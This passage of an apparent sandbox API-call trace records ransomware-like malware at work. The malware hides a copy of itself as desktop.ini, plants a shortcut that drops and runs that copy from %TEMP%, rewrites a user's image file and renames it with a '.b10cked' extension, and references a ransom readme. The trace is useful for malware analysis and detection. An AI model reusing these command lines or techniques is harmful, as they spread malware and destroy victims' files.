lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0219.939] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0219.939] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0219.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI") returned 0x1d [0219.939] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x132 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x132 [0219.939] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0219.939] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & 
del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x6bc, dwThreadId=0x610)) returned 1 [0219.949] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0223.932] CloseHandle (hObject=0x1b4) returned 1 [0223.932] CloseHandle (hObject=0x120) returned 1 [0223.932] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0223.932] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0223.933] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0223.933] GetTickCount () returned 0x3de7c [0223.933] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=28072200720) returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x62\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, 
lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0223.933] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0223.933] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0223.933] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0223.933] CharUpperBuffW (in: lpsz="explorer.exe \"GbkI\" & type \"GbkI\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"GBKI\" & TYPE \"GBKI\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0223.933] CharUpperBuffW (in: lpsz="[HID_NAME]", 
cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0223.933] CharUpperBuffW (in: lpsz="explorer.exe \"GbkI\" & type \"GbkI\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"GBKI\" & TYPE \"GBKI\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0223.933] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0223.933] CoInitialize (pvReserved=0x0) returned 0x0 [0223.934] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0223.935] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0223.935] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0223.935] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0223.937] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"GbkI\" & type \"GbkI\\desktop.ini\" > \"%TEMP%\\bnujXP1G.exe\" && \"%TEMP%\\bnujXP1G.exe\"") returned 0x0 [0223.937] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0223.937] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0223.938] 
ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0223.938] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI.lnk", fRemember=0) returned 0x0 [0223.949] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0223.949] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0223.949] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0223.949] CoUninitialize () [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.950] ReleaseMutex (hMutex=0xf8) returned 1 [0223.950] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\1up3 l.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\1up3 l.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0223.950] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.950] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.950] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.950] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28073964632) returned 1 [0223.950] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.951] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x181f6 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17d0e [0223.952] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x181f6 [0223.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.954] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x181f6 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.954] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xc0fa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.955] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc0fa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49402, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0fc [0223.955] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xc0fa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49402, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0fc [0223.955] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc0fa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc0fa, lpOverlapped=0x0) returned 1 [0223.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="1up3 l.bmp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0223.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1up3 l.bmp", cchWideChar=10, lpMultiByteStr=0x131324c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1up3 l.bmp", lpUsedDefaultChar=0x0) returned 10 [0223.959] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x181f6 [0223.959] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0223.960] CloseHandle (hObject=0x1b4) returned 1 [0223.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\1up3 l.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP") returned 0x32 [0223.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0223.961] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, 
lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf50, dwThreadId=0xe28)) returned 1 [0223.975] CloseHandle (hObject=0x120) returned 1 [0223.975] CloseHandle (hObject=0x1b4) returned 1 [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0223.975] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 3 [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.975] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0223.975] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0223.975] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0223.975] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", 